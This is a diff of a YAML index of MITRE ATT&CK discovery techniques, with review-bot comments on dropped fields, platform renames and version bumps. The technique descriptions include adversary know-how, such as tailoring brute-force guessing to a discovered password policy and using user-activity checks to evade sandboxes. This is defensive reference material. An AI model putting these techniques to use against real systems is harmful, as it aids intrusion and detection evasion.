@@ -50791,56 +51485,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -50862,19 +51511,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
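Review bot: `x_mitre_permissions_required: - User` is dropped from T1087.004 without a replacement, so any consumer that filters or displays techniques by required permissions will lose that information for this entry; confirm the field is gone from the upstream object rather than being dropped by the generator, and mention the removal in the commit message. Separately, the reference key "Google Cloud - IAM Servie Accounts List API" keeps its upstream typo ("Servie"); since `source_name` is the key that `(Citation: ...)` markers in the description resolve against, it must stay byte-for-byte identical until upstream renames it, so do not fix it locally.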
@@ -50945,46 +51636,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -51008,6 +51664,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -51018,9 +51677,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -51030,12 +51694,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -51078,7 +51769,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests:
- name: Permission Groups Discovery for Containers- Local Groups
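Review bot: `spec_version: '2.1'` is dropped here and the same removal repeats for every technique in this change, which makes it a schema change rather than a data refresh; confirm nothing that loads this YAML reads `spec_version`, and call the removal out explicitly in the commit message.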
@@ -51120,7 +51810,7 @@ discovery:
name: sh
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -51131,28 +51821,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
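Review bot: most of this hunk is key reordering (`x_mitre_contributors`, `x_mitre_deprecated`, `x_mitre_domains`, `x_mitre_is_subtechnique` are moved, not changed); the substantive change is the three added platforms (`Identity Provider`, `SaaS`, `Office Suite`) and the version bump `1.5` to `1.6`. Having the generator preserve the upstream key order would keep diffs like this reviewable.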
@@ -51185,9 +51878,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -51230,7 +51922,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -51269,13 +51961,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
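Review bot: T1614.001 loses `x_mitre_attack_spec_version: 2.1.0` entirely here, whereas the other hunks in this change bump that key to `3.2.0`; either the field should be updated rather than deleted, or the reason this technique is treated differently should be documented.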
@@ -51316,87 +52006,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
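Review bot: the diff for T1614 is dominated by the `external_references` list being reshuffled and the technique block being moved below it; the actual content changes are small and worth listing in the commit message: the FBI Ragnar Locker URL host changes from `assets.documentcloud.org` to `s3.documentcloud.org` with a new retrieval date, `x_mitre_version` goes `1.0` to `1.1`, `x_mitre_permissions_required` is dropped, and `revoked: false` and `x_mitre_deprecated: false` are added. Note also the `description: |2-` block begins with an empty line, so the description value starts with a newline; that is carried over from the removed block, but it is still worth checking that consumers strip it.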
@@ -51449,17 +52137,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
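Review bot: the updated description now names the `Microsoft Graph API`, but the citation that follows it is still `(Citation: Azure AD Graph API)`; check that the matching `external_references` entry for this technique (its `source_name` and URL) still describes the API the sentence now refers to, otherwise the citation key and the text disagree.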
@@ -51467,10 +52154,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51479,15 +52168,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
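Review bot: the platform list for T1526 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider`, and the same consolidation appears for T1538 later in this change; any generated index that is keyed on the old platform names needs to be regenerated in the same change, otherwise the indexes and the technique data disagree about which platforms a technique applies to. The added `'Logon Session: Logon Session Creation'` data source is a useful detection hint for cloud service enumeration and should be reflected in any detection mapping derived from this file.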
@@ -51515,9 +52205,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -51592,7 +52279,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -51664,7 +52350,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests:
- name: Network Service Discovery for Containers
@@ -51750,12 +52435,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51776,12 +52460,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51806,7 +52489,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
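Review bot: after the `spec_version` removal, the T1538 block goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []` with no `identifier: T1538` line, while T1201, T1614, T1518.001 and T1526 in this same file each carry an `identifier:` key before `atomic_tests`; the inconsistency predates this change, but since the generator is being touched anyway it would be the right moment to emit `identifier` uniformly or drop it everywhere.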
@@ -51861,7 +52543,7 @@ discovery:
